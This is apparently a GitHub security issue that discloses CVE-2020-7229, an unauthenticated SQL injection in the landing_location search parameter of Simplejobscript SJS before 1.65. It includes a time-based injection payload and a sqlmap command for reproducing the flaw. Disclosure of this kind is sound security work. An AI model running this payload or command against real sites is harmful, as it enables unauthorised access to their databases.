Skip to content

[security] CVE-2020-7229, SQL injection in search function #7

Closed
@gwen001

Description

@gwen001

Description: An issue was discovered in Simplejobscript.com SJS before 1.65. There is
unauthenticated SQL injection via the search engine. The parameter is landing_location. The function is countSearchedJobs(). The file is _lib/class.Job.php.

Environment:

  • Version: 1.64
  • OS: Ubuntu 16.10
  • Web server: Apache 2.4.18
  • PHP: 5.6.40
  • Database: MySQL 5.7.28
  • URL: /searched

Payload: landing_title=aaa&landing_location=77+or+(select+(sleep(2)))

Steps to Reproduce:
$ sqlmap --threads=10 --batch --dbms=mysql -u "http://local.simplejobscript.net/searched" --data="landing_title=aaa&landing_location=77" -p landing_location --banner

PoC:
sjs-sqli-search

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions